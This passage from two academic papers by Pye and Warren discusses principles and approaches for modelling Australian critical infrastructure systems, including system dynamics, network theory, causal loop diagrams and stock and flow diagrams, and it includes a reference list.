robust and better able to withstand and cope with the rigours of natural hazards, crippling failures,
accidents and incidents as they occur in the future.
Due to the increasing importance of secure critical infrastructure systems, there is an effort to develop
analysis and modelling approaches that can accurately model critical infrastructure system behaviour,
identify interdependencies and vulnerabilities to various threats. Some of the potential outcomes of
analysis and modelling simulation approaches to assessing critical infrastructure systems may prove
beneficial to governments, government agencies, military planning and defence, community expansion
plans. This would reduce costs, enhance critical system redundancy, improve traffic flow, secure data
and information protection and better prepare for and respond to emergencies (Pederson et al 2006).
Although in the context of Australian critical infrastructure system characteristics, there are modelling
considerations that are particular to the subject critical infrastructure systems’ relevant environment.
197

Graeme Pye and Matthew Warren
4. Critical infrastructure system modelling considerations
In briefly discussing and identifying the generic characteristics of Australian critical infrastructure systems,
the following outlines the specific modelling considerations required for representational modelling of
critical infrastructure systems, circumstances and their attributes (Pye & Warren 2008):
Systematic scoping perspective of the system to be modelled or part thereof and granularity detail of
hierarchal levels within the subject system;
Identifying system criticalness and points of criticalness with the subject system;
Systems are generally transitional (services move from source to destination);
Systems are distributed in character;
Systems operate autonomously or semi-autonomous (typically no central control for cooperating
subsystems);
Deadlocking issues (transport, communication);
System scalability (systems made up of subsystems) and complexity;
Network connected systems (stand-alone) systems and the relationships (dependency and
interdependency);
Operational factors and environmental influences (internal and external);
System redundancy and backup systems;
Control and communication (critical pathways, internet);
Time (temporal) scale dynamics within and around systems;
Depict ‘cause and effect’ and possible dynamic changes within system/s; and
System concurrency issues.
The ability to model these systems (incorporating the considerations above) in a relevant context is
important to assessing system security, understanding functionality and dynamic behaviours in order to
develop strategies that address and maintain the continuity of service. This in part relies upon identifying
and protecting key points of infrastructure system concentration, pinch or choke points and remote
exposures in order to maintain high-levels of service assurance, continuity, system availability and short
system restoration times.
5. System modelling principles
The overarching principle applied to system modelling should incorporate a ‘keep it simple’ approach for
the development of such system models. This is important because of the highly complex nature of
critical infrastructure systems and the system model must remain representative of the system to enable
security points within the system to become visible. To achieve this and remain consistent in application,
the following fundamental modelling principles represent an attempt to focus on the consistent application
of modelling techniques as applied to critical infrastructure systems (Pye & Warren 2007).
The research of Pidd (1996) developed five desirable and simple principles to apply to the development
of discrete computer simulations or in the use of programming language; similarly these same principles
can also be adapted and utilised as guides to the development of critical infrastructure system models, as
follows (ibid):
Model Simple, Think Complicated. This identifies that the modeller must keep in mind that the model
itself is a tool to support and extend the thinking, impressions and conceptual understanding of the
physical system as a model. Therefore the avoidance of additional complexity and need for clear
physical system boundaries are established for the system model.
Be Parsimonious, Start Simple and Add. The problem with the previous principle is identifying where
the balance lies between simplicity and complexity. There is no general answer to this problem, but a
solution lays in adopting a ‘prototyping approach’ where the gradual development of the model starts
out with simple assumptions and by only adding further complexity as it becomes necessary.
However this does require continued refinement and revision to avoid adding unnecessary
complexity to the model.
198

Graeme Pye and Matthew Warren
Divide and Conquer, Avoid Mega-models. This is common advice given to those dealing with a
complex problem, the aim being to breakdown the problem by decomposition of the system into
manageable component parts that apply the previous principle to develop the system model.
Do Not Fall in Love with Data. The model should drive the data collection, not the other way round,
and this requires the modeller to develop ideas for the model and its parameters from a selective
perspective of what data types are collected, analysed, interpreted and implemented into the model
together with a feedback testing regime to test the model developed.
Model Building May Feel Like Modelling Through. As the model is an attempt to represent part of
reality or an action taken or to increase understanding, the consideration remains that the model at
some point becomes the best representation it can be and continued ‘muddling’ with the model can
be detrimental to assumptions based on the completed model.
These modelling guides adapted from Pidd’s (1996) work illustrate some key points of reference that
attempt to maintain consistency when developing, analysing, and implementing models within the realm
of modelling of critical infrastructure systems. This will assist the modeller to (Pye & Warren 2007):
Categorise and develop an understanding of the problem context for modelling;
Decide on the model structure based on analysing the available data;
Determine model realisation of where the parameters of the model have been established;
Identify a model assessment as the point at which the model is deemed acceptable, valid and usable
as a system model that reflects normal functionality; and
Apply model implementation, by utilising the model to gain valuable predictive data and likely system
scenario responses.
These system modelling principles offer common sense guidelines that are applicable to modelling critical
infrastructure systems and dealing with the complexities of the characteristics incumbent of critical
infrastructure systems.
6. Conceptual system modelling objectives
Furthermore in conceptually modelling critical infrastructure systems, there are system modelling
objectives that provide deliverable insights into critical infrastructure systems through their modelling.
This should strive to deliver from the perspective of system functionality, security characteristics and
dynamic behaviour, but not limited to the following (CIPMA 2007):
Identify system scope, interconnections between systems both within and across critical
infrastructure sectors incorporating levels of scale and future system scalability;
Deliver insights into the system behaviours and responses of complex networks and their
communication, control and service provision dynamics;
Identify and analyse the extent and influential magnitude of relationships between cooperating
systems, particularly from the aspect of dependency and interdependency relationships;
Observe through applied modelling, normal system functionality and predict the potential flow-on
effects of critical infrastructure system failure and likely cascading impacts;
Identify potential system choke points, single points of failure and other likely security vulnerabilities;
Model assessments of potential security measures for systems prior to their physical implementation;
Apply risk and security mitigation strategies to test and evaluate the beneficial or otherwise outcomes
for continuity planning and development; and
Models must be conceptually representative of the physically distributed nature and functionality
characteristics of the subject infrastructure systems.
Understanding and appreciating the characteristics and idiosyncrasies of critical infrastructure systems
and the specific considerations are the foundations upon which the conceptual modelling of these
systems can deliver the modelling objectives as listed previously. The modelling of such systems
demands of the modeller an intimate understanding and appreciation of the complexities of subject
systems, to deliver a representative and well-scoped model, for without the knowledge gleaned from
analysing system models, any subsequent critical infrastructure system model produced cannot be a
representative model.
199

Graeme Pye and Matthew Warren
7. Australia’s critical infrastructure: Discussion and context
Critical infrastructure systems are vitally important to the economy and the community. Particularly with
the proliferation of telecommunication and information infrastructures, it is apparent the profound
influence those critical infrastructures and the services they deliver to all levels, structures and
functionality of the economy and society. As history has shown, infrastructure innovation has boosted
economic growth, contributed to improved public health, changed the mobility of society and improved
information networks and brought comfort to the community.
In many aspects, present-day critical infrastructures were laid out to service the development of an
industrial economy and to an extent seemed inadequate and ill-prepared as the backbone of the new
modern economic structure relating to information and knowledge-based services. The service-based
economy expects highly reliable, flexible and quality services rather than cheap utilities and commoditybased
services. There is continuing public consternation with the performance of some critical
infrastructures particularly where users have tailor-made quality-of-service and service-on-demand
expectations that have been plagued with problems of road congestion, power outages, stressed public
transport systems, viruses and denial of service attacks on the internet.
It seems that many of the traditional critical infrastructures were slow in adapting to societal demands.
This is in part due to the deep ‘embeddedness’ in spatial and economic structure including the large,
long-term capital investment in the physical basis of critical infrastructure systems, which remain barriers
to the adoption of timely innovations and their adaptation to changing requirements of users and system
security and service availability requirements. However, in contrast to the resistance of physical
infrastructures to change, profound and ongoing change has been unleashed in the Australian context
with public ownership, organisation and market structure of critical infrastructure sectors resulting from
de-regulation and privatisation of critical infrastructure systems. Additionally, the convergence of markets
and the contraction of ownership into multi-utility organisations will greatly increase the complexity of
infrastructure industries and the regulation of infrastructure bound markets.
The private and public owners in the infrastructure industry now have heightened security obligations with
regard to the Australian national security status. This includes maintaining critical infrastructure system
availability and supply of services to industry, business and the wider community who are increasingly
dependent and reliant on critical infrastructure systems. Further compounding this situation is the
increasing interconnectedness between infrastructures via the information communication technologies
that are increasingly pervading these systems and therefore creating new interactions, interdependencies
and dependency relationships. These technological innovations have thus introduced new risks and
vulnerabilities enabling decentralised utility supply, distributed, autonomous control of network operations
and information sharing provided by multifunctional information and communication infrastructures.
The collection of interactive change processes in the Australian infrastructure industry is creating a new
generation of critical infrastructures so interwoven with new technologies that traditional approaches to
managing spatial planning, policy making, regulation, technological, information and communication,
physical and cyber security require rethinking. Similarly, governments and owners and operators have to
take into account their interactions and connections with other critical and non-critical infrastructure
systems, particularly in terms of capacity allocation, service provision, system availability planning and
security as a function of changing economic and regulatory conditions. Furthermore, understanding
critical infrastructure system behaviour and security implications, vulnerabilities and mitigating identified
security risks is a current concern of many nations, including Australia.
In terms of a system thinking perspective and comprehending the design, operation, management and
ultimately the security of any critical infrastructure system, it is important to be able to conceptualise the
system goals, performance at differing levels of the greater system structure and the behavioural aspects
of subsystems. Structurally, critical infrastructures are large integrated systems, which are comprised of
subsystems linked together into a network organised system. The result is a ‘cause and effect’ influenced
system with integrated subsystems and interfaces enabling interactive effects. Particularly where an
interface represents: the contact area between one system and another system element; or the system
and the human; or its environment. For example, such interactions across an interface may relate to
energy and material flows, information exchanges, personal communications, and propagation of cause
and effect influences, operational decisions and control manipulations.
200

8. Conclusion
Graeme Pye and Matthew Warren
As Bentley (2006) intimates, critical infrastructure systems tend to be interdependent and even
interconnected and systems failure – be it through natural disaster, terrorism or poor management – can
bring entire communities and their industries and utilities to a grinding halt. Therefore, the ability to
analyse and critique the security aspects of critical infrastructure systems, together with modelling these
systems offers an avenue for assessing critical infrastructure system security, identifying vulnerabilities
and locating inherent weaknesses, so appropriate solutions and remedial action can be implemented to
mitigate such security risks to system availability and service supply. To address this directly and return
to the focus of this research with regard to how to critique and model critical infrastructure systems, the
previous system analyse and modelling descriptions have outlined a number of differing methodological
approaches and their characteristics. Additionally, descriptions of a number of potential system modelling
approaches applicable in a security context were characterised and are potentially both adaptable and
suitable to modelling critical infrastructure systems. While each system security analysis approach and
system modelling approach reviewed is capable on their own terms, they remain limited and narrow in
focus for analysis and modelling of critical infrastructure systems. Therefore, it is proposed that a possible
solution to critique and model critical infrastructure systems may lay in the development of a generic
multifaceted or blended methodology that outlines the adoption of multiple system analysis and modelling
approaches. This would represent a hybrid methodology that in turn would form the basis for combining
multiple approaches as a single multifaceted practical framework application for security analysis and
modelling of a critical infrastructure system.
References
Avison D.E. (2003a), 'Blended Methodologies', in Information systems development, methodologies, techniques and
tools, (ed.). 3rd Edition, McGraw Hill, Maidenhead Berkshire, pp. 379-387.
Avison D.E. (2003b), 'Modelling Themes', in Information systems development, methodologies, techniques and tools,
(ed.). 3rd Edition, McGraw Hill, Maidenhead Berkshire, pp. 73-81.
Bentley A. (2006), 'Infrastructure: Critical Mass', CSIRO Solve, No.7.
Berntsen K.E. Sampson J. Osterlie T. (nd), Interpretive research methods in computer science. Online:
http://www.idi.ntnu.no/~thomasos/paper/interpretive.pdf Accessed: April 2008.
Brown T. Beyeler W. Barton D. (2004), 'Assessing infrastructure interdependencies: the challenge of risk analysis for
complex adaptive systems', International Journal of Critical Infrastructures, Vol.1, No.1, pp. 108-117.
CIPMA (2007), Critical Infrastructure Protection Modelling and Analysis (CIPMA) Program. Fact Sheet, Trusted
Information Sharing Network (TISN). Online: http://www.tisn.gov.au Accessed: December 2007.
Dennis A. Wixon B.H. Roth R.M. (2009), Systems Analysis & Design with UML Version 2.0, 3rd Edition, John Wiley &
Sons Inc., New York, USA.
Little R.G. (2003), 'Toward More Robust Infrastructure: Observations on Improving the Resilience and Reliability of
Critical Systems', in 36th Hawaii International Conference on System Sciences (HICSS'03) IEEE Computer
Society, pp. 58-66.
Macdonald R & Bologna S. (2003), Advanced Modelling and Simulation Methods and Tools for Critical Infrastructure
Protection. Online: http://www.iabg.de/acip/doc/wp4/D4_5_v0_1_RM.pdf Accessed: March 2003.
Murray A.T. & Grubesic T.H. (2007), 'Overview of Reliability and Vulnerability in Critical Infrastructure', in Critical
Infrastructure, (ed.). Springer Berlin Heidelberg, Berlin, pp. 1-8.
Mussington D. (2002), Concepts for Enhancing Critical Infrastructure Protection: Relating Y2K to CIP Research and
Development, RAND Santa Monica, CA, USA.
Pederson P. Dudenhoeffer D. Hartley S. Permann M. (2006), Critical Infrastructure Interdependency Modeling: A
Survey of U.S. and International Research, Idaho National Laboratory (INL), Idaho Falls.
Peters K. Buzna L. Helbing D. (2008), 'Modelling of cascading effects and efficient response to disaster spreading in
complex networks', International Journal of Critical Infrastructures, Vol.4, No.1/2, pp. 46-62.
Pidd M. (1996), 'Five Simple Principles of Modelling', in Proceedings of the 1996 Winter Simulation Conference,
ACM, pp. 721-728.
Pye G. & Warren M.J. (2006), 'Security Management: Modelling Critical Infrastructure', Journal of Information
Warfare, Vol.5, No.1, pp. 46-61.
Pye G. & Warren M.J. (2007), 'Locating Risk through Modelling Critical Infrastructure Systems', in Human Aspects of
Information Security & Assurance (HAISA), Plymouth, UK, pp. 87-98.
Schulman P.R. & Roe E. (2007), 'Designing Infrastructures: Dilemmas of Design and the Reliability of Critical
Infrastructures', Journal of Contingencies and Crisis Management, Vol.15, No.1, pp. 42-49.
Svendsen N.K. & Wolthusen S.D. (2007), 'Connectivity models of interdependency in mixed-up critical infrastructure
networks', Information Security Technical Report, Vol.12, No.1, pp. 44-55.
Wood-Harper A.T. Antill L. Avison D.E. (1985), Information Systems Definition: The Multiview Approach Blackwell
Scientific Publications, Oxford.
Zimmerman R. & Restrepo C.E. (2006), 'The next step: quantifying infrastructure interdependencies to improve
security', International Journal of Critical Infrastructures, Vol.2, No.2/3, pp. 201-214.
201

Modelling Relational Aspects of Critical Infrastructure
Systems
Graeme Pye and Matthew Warren
Deakin University, Geelong, Australia
graeme@deakin.edu.au
mwarren@deakin.edu.au
Abstract: The relational aspects for critical infrastructure systems are not readily quantifiable as there are numerous
variability’s and system dynamics that lack uniformity and are difficult to quantify. Notwithstanding this, there is a
large body of existing research that is founded in the area of quantitative analysis of critical infrastructure networks,
their system relationships and the resilience of these networks. However, the focus of this research is to investigate
the aspect of taking a different, more generalised and holistic system perspective approach. This is to suggest that
that through applying network theory and taking a ‘soft’ system-like modelling approach that this offers an alternative
approach to viewing and modelling critical infrastructure system relational aspects that warrants further enquiry.
Keywords: critical infrastructure, dependency relationships, systems modelling
1. Introduction
Modern critical infrastructure systems exist ubiquitously and what constitutes a system evokes different
meanings, perceptions and conceptual visualisations to different individuals depending on their
interpretation of the focal structure. Essentially, a system construct is a derivation of its functional
characteristics, physical structure, response behaviours and incorporates its inferred complexity of
components that interact to form a single functional system representation. Systems exist to perform
purposeful functions and they are as elementary as a single function system or as a large complex
systems comprised of numerous subsystems, all working cooperatively for the common intent (Maani &
Cavana 2000).
Systems of this structure are characterised as networks, where the components form the nodes that link
together forming the network system topology that facilitate interactions between the nodes within the
wider network. Many physical infrastructure systems are characterised as networks, for instance power
and water distribution grids are large common examples of networks, but there are many less obvious
and smaller example systems cast in this form. The advantage of viewing systems as networks is that
their determining behaviour is largely a result of the pattern or topology of network linkages, rather than
what specifically passes across the links. Therefore, understanding how the network functions as a
degree of its topology can assist in deducing how the system is likely to behave by investigating its
network configuration (Finnigan 2005).
There are many different system structures and configurations that characterise network systems and
their dynamic functional behaviours. This paper seeks to outline the premise of future research focussing
on a particular network theory as the basis of critical infrastructure system research and two interpretative
modelling approaches for modelling the relational aspects of dynamic critical infrastructure systems. This
will act is a precursor to determining a modelling approach that is suitable for illustrating the inter-system
relationships between dynamic critical infrastructure systems and their dependency and interdependency
aspects.
2. System dynamics
System dynamics as Forrester (1991, p.5) explains “combines the theory, methods and philosophy
needed to analyse the behaviour of systems in not only management, but also in environmental change,
politics, economic behaviour, medicine, engineering, and other fields.” System dynamics provides a
common foundation that when applied, can deliver insights into changes occurring within systems over
time by drawing upon concepts from the field of feedback control.
Therefore, systems dynamics is utilised as a method for analysing, studying and managing complex
feedback systems. Feedback is the situation where via a process of ‘cause and effect’, X influences Y,
which in turn influences X via a feedback process. Therefore, the study of X and Y cannot be undertaken
independently as it is the link between X and Y that predicates how the system will behave (SDS 2006).
This example illustrates the circular process where dynamic decisions cause changes that in turn will
influence later decisions within the system structure (Forrester 1998) as shown in Figure 1.
202

Graeme Pye and Matthew Warren
Figure 1: Closed-Loop structure of the world (Forrester 1991)
The elementary premise of a feedback system is that each action is in response to the current conditions
and therefore such actions in turn affect further conditions, which become the conditional basis for future
action. There is no beginning or end to this feedback process and this is further complicated with other
interconnection relationships and the interactions of human beings (Forrester 1968). As such, the
intertwining of many feedback loops can result in local or global cascading chains of actions where a
system is reacting to the echo of the system’s past actions, including the past actions of other entwined
systems (Forrester 1994 & 1995, Checkland 2000, Watts 2000).
In reality, system feedback is inevitably what confronts people who are responsible for the operational
control of dynamic systems in situations such as industrial production, national economics, global
warning or even interpersonal relationships. Contextually, the responses to these problems are
manifestly dynamic decisions that require additional and related decisions because the situation changes,
both by itself and in response to the previous decisions and actions taken (Jensen & Brehmer 2003). As
Warren (2005) identifies, the dynamics of systems requires the application of powerful logic to
comprehend how systems are consequence reactive to changes and decisions taken in the management
and control of such systems, which add further complexity to the operation of dynamic systems.
The study of system dynamics is concerned with constructing quantitative and qualitative models of
complex problem domains and then investigating the response behaviours of the system models over
time. According to Luna-Reyes and Anderson (2003) system dynamics depends heavily on quantitative
data to generate feedback models, although the analysis of qualitative data has a role to play at all levels
of the modelling challenge. Often the experimentation undertaken with these models demonstrates how
unappreciated causal relationships, dynamic complexity and structural delays become within the subject
system, which leads to counter-intuitive results of less informed approaches to improving system
functionality. Additionally, system dynamic models enable the incorporation of ‘soft’ factors such as
motivation and perception that are advantageous to improved system understanding and management
(Caulfield & Maj 2002).
3. Dynamic systems modelling
Constructing a useful interpretation or model a dynamic system requires an analysis of the system to
deliver a useful understanding of the system situation through elaboration, exploitation and interpretation
of the system. While this is heavily reliant on the mental interpretation of the developer, it is a useful
representation of a given understanding of the system situation at a given moment, together with the
perceived structure of the system (Schaffernicht 2006). There is no single formalised approach applicable
to modelling system dynamics, however Caulfield and Maj (2002) suggest the lessons for modellers are
to: just start modelling, try things, listen to the advice of experienced modellers and simply iterate, iterate
and iterate the model development process.
Modelling the dynamic behaviours within systems offers some potential benefits including (Caulfield &
Maj 2002):
Dynamic system modelling contributes to developing an understanding of the subject system problem
domain through the processes of analysis and critical thinking, as applied to a physical system.
A primary benefit of dynamic system modelling lies in its ability to not only represent quantitative or
‘hard’ system variables such as program size, staffing numbers or cost of investment; but also the
qualitative or ‘soft’ variables that impact system dynamics, such as motivation, commitment,
confidence or perceptions.
203

Graeme Pye and Matthew Warren
Traditionally, the focus has been on the quantitative variables of the system because of an applied
engineering approach and considerations of the ‘soft’ variables were too difficult to measure and their
importance underestimated. Yet the risk of omitting the ‘soft’ variable circumstances is to fail to consider
the essential human impact.
System improvement alternatives often come from intuitive insights uncovered during the initial analysis,
from the previous experience of the analyst, from proposals forwarded by people operating the system
based on their practical experiences and the skill of imagining creative alternatives. As Senge (1990)
indicates, the cause of many problems lie in the well intentioned policies designed to alleviate them,
developed by policymakers lured into designing and applying interventions that only focus on the
symptoms and not the underlying causes. This approach only produces short-term benefits and fosters
the need for further symptomatic interventions. However, by modelling and simulating the problem
domain using a systems dynamic model, it is possible to enact decisions from a more informed rational
basis, safe from the actual physical dangers of real-world experimentation and complexity (Caulfield &
Maj 2002).
4. Complex systems paradigm
In essence, the dynamics within each system is dissimilar because of factors such as the structure,
environment and complexity of the system itself that will influence the dynamics of systems. The
theoretical study of complex systems has been on the organisational arrangements that influence the
development and persistence of particular system features. Although it is the relationship between
system elements (i.e. structure), rather than the system elements and their properties (i.e. composition)
that are significant. The emphasis on structure over composition makes the analytical approach to
studying complex systems applicable across disciplines as many different types of systems can be
characterised utilising similar analytical tools (Parrott & Kok 2000).
The increased capabilities of computing power have enabled the investigation of networks consisting of
millions of nodes and therefore explore questions that were previously beyond comprehension. This
according to Christensen and Albert (2007) underlines the need to move beyond reductionist
approaches, where understanding of all complex systems is in terms of their simpler components, to an
approach that instead attempts to understand the behaviour of the system as a whole.
5. Network systems paradigm
Many physical systems consist of network configurations, for instance, power and water distribution grids
are large common examples of networks, but there are many less obvious and smaller example systems
cast in this form. The advantage of viewing systems as networks is that typically their determining
behaviour is largely a result of the pattern or topology of network linkages, rather than what specifically
passes across the links. Therefore, understanding how the network system functions as a degree of its
topology can assist in deducing how the system is likely to behave by investigating its network
configuration (Finnigan 2005).
Interestingly, the network theory research of Watts (2004) draws together the analysis and modelling of
networks incorporating dynamic features of real-world systems, where their interactions are characterised
as neither entirely ordered or completely random, but tend to exhibit properties of both. The criterion that
is the premise of this network theory is that networks are (Watts 1999a):
Characterised as a large number of connected elements;
The network is sparse in structure where each element is connected to only an average but not all
other elements of the network;
The network is decentralised and there is no dominate central point of connection;
There is a clustering element where there is some degree of overlapping inter-nodal connection
between elements within neighbouring network system clusters.
A feature of this type of distributed network structure is that some of the network elements are more
significant than others because of their connectedness with other connected elements, including those
within other overlapping clusters.
As Callaway et al (2000) attests, the internet, social networks, airline routes and electric power grids
exemplify networks of this nature whose function and resilience critically relies on the pattern of
interconnection between the elemental components of the system. The degree of robustness or fragility
204

Graeme Pye and Matthew Warren
of the overall system is largely dependent on the configuration of the network connections. Therefore,
Callaway et al (ibid) postulates that if the pattern of connection is appropriately chosen, then the network
system can be highly resilient to random lose of network elements resulting in only minimal localised loss
of function.
However, the network would remain susceptible to a targeted attack on specifically chosen and
significant network elements or linkages, whose loss would globally impact the entire network system
functionality. Watt’s (1999b) supports this premise too where the dynamic functional sense of the entire
network, local actions within the network system can have causal global consequences. This influence is
a product of the relationship between the properties of local and global dynamics that depend critically on
the structural connectivity and topology of the network.
Therefore, the anatomy of the network is important because the structure affects the function, so the
topology of a social network will affect the spread of information, or disease; likewise the topology of an
electrical power grid will affect the robustness and stability of the transmission system and the availability
of supply (Strogatz 2001). Many of these network systems exist widely in the modern world and are
evident as differing categories of network systems with differing functions, but all serve to link together
those elements necessary to achieve the greater goal.
6. Network system types
In achieving their common goal, the nature of networks and their type represent the linkages between
differing system entities, which likewise have a vested interest in cooperating together to achieve the
greater goal.
There are principally four loose categories of networks (Newman 2003):
1. Social networks consist of a set of people or groups of people with some pattern of contacts or
interactions between them.
2. Information networks are sometimes called knowledge networks. The classic example of an
information network is the network of citations between academic papers.
3. Technological networks are man-made networks typically designed for the distribution of some
commodity or resource, such as electricity or information. The electric power grid is a prime example
including the telephone network and the underlying telecommunication infrastructure.
4. Biological networks represent suitable systems in nature and perhaps the classic example of a
biological network is the network of metabolic pathways, which is a representation of metabolic
substrates and products with connections joining them, if a known metabolic reaction exists that acts on
the given substrate and produces a given product.
The common characteristic of these systems is that when a network is carrying a particular resource
(friendship, data, electricity or biological substrate) the nodes of the network will experience a load and in
normal circumstances the magnitude of the load would not exceed the capacity of the node.
Unfortunately failures tend to cascade in a network environment, for instance, if a heavily loaded node is
lost, then a redistribution of the load (i.e. the flow passing through it) to other functional nodes within the
network is undertaken. However, this redistribution may cause other nodes to exceed their load capacity
causing them to fail too, thereby propagating the failure to the extent that it cascades across the network
until all network nodes fail. Although, if the overloaded node did not fail, then protection mechanisms shut
it down anyway, to prevent a node failure from propagating throughout the network and cascading across
the entire network (Newth & Ash 2005). Normally network systems can cope with load changes and
adapt in a limited manner to address those problems of load distribution, although they are not strictly
adaptive or necessarily totally autonomous systems.
For example, large-scale interconnected infrastructures such as telecommunications networks and the
internet are complex adaptive systems. These infrastructures are vastly more adaptive and dynamic in
comparison to their predecessors and consist of large numbers of diverse components and participants
of differing forms, function and capability (Herder & Verwater-Lukszo 2006). Additionally, these
infrastructure systems also exhibit characteristic unstable coherence and resilience in spite of
205

Graeme Pye and Matthew Warren
environmental disruptions or central governance (North et al 2002) and go a long way towards being
resilient systems.
Furthermore from the networked system perspective, the research of Watts (2004) draws together the
analysis and modelling of networks incorporating dynamic features of physical systems, where their
interactions are characterised as neither entirely ordered or completely random, but tend to exhibit
properties of both. The premise of this network structure criteria is that networks are: characterised as a
large number of connected elements; the network is sparse in structure where each element is connected
to only an average but not all other elements of the network; the network is decentralised and there is no
dominate central point of connection and finally the network is clustered where there is some degree of
overlapping connection between elements within neighbouring system networks clusters (Watts 1999a).
The significance of this view of critical infrastructure systems is that it characterises to an extent the
structure of these systems and their inter-connections. This then forms the basis for further research to
apply this to the topology of network systems and to model the relational and influential aspects of critical
infrastructure interconnection.
7. Modelling system relationships
The primary intention of system modelling is to utilise conceptual modelling as a means of facilitating the
comprehension of patterns of change, functionality and dynamic behaviours that a system exhibits and to
identify the conditions that cause systems to remain stable or become unstable. Furthermore, through
experimentation applied to system model parameters and characteristics, the knowledge derived can
suggestively indicate what may or may not translate into the real-world system situation. However, it is
important to be mindful that the interpretation process of translating physical systems and information into
various model elements requires persistence and remains an inexact process, but applied trial and error
and experiential judgement remain valid approaches to model development (Stacey 1996).
7.1 System dynamics, the causal modelling approach
In this example a small business system process illustrates the dynamic characteristics of a simple
business situation in relational terms, utilising a causal loop diagram to represent the dynamics of the
system process. The example models a simple advertising premise for the sale of a durable product and
the initial assumption is that there is a pool of Potential Customers who may become Actual Customers
through product sales. As Figure 2 depicts, Potential Customers and sales as connected via a negative
feedback loop with the goal of reducing Potential Customers to zero. However, after an advertising
campaign it is reasonable to assume that the greater number of Potential Customers, the greater number
of sales generated, thus indicated by the positive (+) arrow between Potential Customers and sales.
Similarly, greater sales reduces the number of Potential Customers (as they are converted to Actual
Customers by sales) and this is shown by the negative (-) arrow from sales to Potential Customers. In
this, case the causal loop diagram in Figure 2 is a negative feedback loop because of the odd number of
negative links in the feedback loop between Potential Customers and sales (Kirkwood 2005a).
Figure 2: Advertising example causal loop diagram (Kirkwood 2005a)
The conclusion drawn from the diagram modelling this dynamic process is the obvious insight that the
number of sales will reduce to zero when the number of Potential Customers reaches zero. This simply
illustrates how a causal loop diagram can model a dynamic system process, however the insight gained
here would not be particularly useful, as there is no information regarding the rate at which the number of
Potential Customers would diminish in this case (Kirkwood 2005a).
The causal loop approach is particularly useful for representing the dynamic and changeable nature of
system and process relationships that are typically difficult to describe verbally, because normal language
presents interrelations in linear cause and effect chains, while Figure 2 shows that in the actual system
206

Graeme Pye and Matthew Warren
there are circular chains of cause and effect (ibid). Furthermore, the modelling of dynamic systems
incorporating greater system complexity and interaction together with additional system component
relationships is possible with causal loop diagrams, and the following example illustrates this further and
explains the notation used.
7.2 Causal loop diagram notations
The causal loop diagram in Figure 3 is a conceptual model representation of the systematic process of
filling a glass of water. This diagram includes elements and arrows (the causal links) linking the various
elements together and includes either a positive (+) or negative (-) sign on each link to indicate the
following intentions (Kirkwood 2005b):
A causal link from one element A to another B is positive (+), if either A adds to B or a change in A
produces a change in B in the same direction.
A causal link from one element A to another B is negative (-), if either A subtracts from B or a change
in A produces a change in B in the opposite direction.
The model representing the filling a glass of water example utilises the modelling notation as illustrated in
Figure 3.
Figure 3: Causal loop diagram notations (Kirkwood 2005b)
Initially to describe the model, if the Faucet Position is increased then the Water Flow increases and
therefore the causal link (arrow) is positive. Similarly, when the Water Flow increases then the Water
Level in the glass will increase and therefore the causal link between these two elements is positive (+)
too. The next element is the Gap and this signifies the difference between the Desired Water Level
element and the actual Water Level (i.e. Gap equals Desired Water Level minus actual Water Level).
From this it follows that an increase in Water Level decreases the Gap and this is a negative (-) causal
link. Finally, to complete the causal link back to the Faucet Position, a greater value for the Gap logically
leads to an increase in Faucet Position, which is a positive (+) causal link. Although remembering that the
additional causal link shown in the diagram from the Desired Water Level to the Gap element is modelling
an existing external influence to the system process and from the explanation given above, the influence
is in the same direction along this causal link and is therefore a positive (+) causal link (Kirkwood 2005b).
The sign of a particular loop referring to the whole feedback system process is determined by counting
the number of minus (-) signs on all the causal links making up the entire loop. More specifically:
A feedback loop is positive and denotes a plus (+) sign in parentheses, if the loop contains an even
number of negative casual links.
207

Graeme Pye and Matthew Warren
A feedback loop is negative and denotes a minus (-) sign in parentheses, if the loop contains an odd
number of negative causal links.
In the Figure 3 example, the diagram represents a single causal feedback loop with one negative sign on
its causal links only and hence an odd number of negative signs. Therefore, in the centre of the loop
diagram the negative (-) sign in parentheses consists of a small looping arrow to indicate clearly that the
sign is referring to the whole loop (Kirkwood 2005b).
The causal loop diagram modelling approach may prove applicable for modelling the inter-relationships
between critical infrastructure systems and warrants further investigation. However, this requires further
research and application in the context of modelling critical infrastructure system relationships to judge its
effectiveness.
7.3 Stock and flow modelling approach
Another form of dynamic system modelling that is growing in popularity within business particularly is the
stock and flow diagram whose notation consists of three different types of elements, namely, stocks,
flows and information. The three elements together in a diagram graphically represent any dynamic
process that may be apparent in any business and therefore can be utilised to represent the
characteristics of such processes and illustrate the relationship among variables that have the potential to
change over time (Kirkwood 2005a).
Figure 4 illustrates an example of a very simple stock and flow diagram with the three elements Casual
Staff, sales and Permanent Staff which models the structure of the business process concerning the rate
at which Casual Staff numbers reduce to zero, as the number of Permanent Staff required is dictated by
the flow of sales.
Figure 4: Example stock and flow diagram (Kirkwood 2005c)
The two different types of variables illustrated inside the rectangles are called a stock, level or
accumulation. The variable sales is shown next to the ‘butterfly valve’ or ‘bow tie’ symbol and this type of
variable is known as a flow or rate, thus the two lines through the butterfly valve look like a pipe with the
valve controlling the flow. The premise of the above figure is that it represents the flow of Casual Staff
towards Permanent Staff, with the rate of flow controlled by the sales valve; this is the key idea behind
the difference between stock and flow. Therefore, a stock represents an accumulation of something and
a flow is the movement of something from one stock to another (Kirkwood 2005c).
The final element of Figure 4 is the information link represented as a curved arrow and this notation
represents the value of Casual Staff influencing the value of sales. Additionally, and of equal importance,
is the lack of an information arrow from Permanent Staff to sales, which illustrates that information
regarding the value of Permanent Staff has no influence over the value of sales (ibid).
7.4 Stock and flow appraisal
The purpose of the stock and flow diagram is to depict the process changes and how the elements and
the structure of these processes interact together to bring about change. This form of modelling focuses
on the elements that make up the process (sometimes likened to the components of the system), and
how the performance of the process changes over time and forms the basis of studying the dynamics of a
simple process using stock and flow diagrams.
The underlying weakness of stock and flow diagrams is that they can only deliver a simplistic
representation within a defined process boundary of a simple process. Unfortunately, from the
208

Graeme Pye and Matthew Warren
perspective of modelling examples of critical infrastructure systems for instance, stock and flow diagrams
are not readily applicable to this type of system modelling due to the size and complexity of the systems.
The other important issue is the scalability potential of stock and flow diagrams with regard to these
systems as they tend to become difficult to interpret due to the diagrams added complexity in depicting
the logical interconnection, processes and dependency relationships of critical infrastructure systems. It
appears that stock and flow diagrams are better suited to modelling less complex system processes with
clearly defined boundaries, and is not necessarily well suited to modelling multiple interconnected and
large complex critical infrastructure systems from a relational perspective.
8. Conclusions
As Bentley (2006) intimates, critical infrastructure systems tend to be interdependent and even
interconnected, and system failures – be it through natural disaster, terrorism or poor management – can
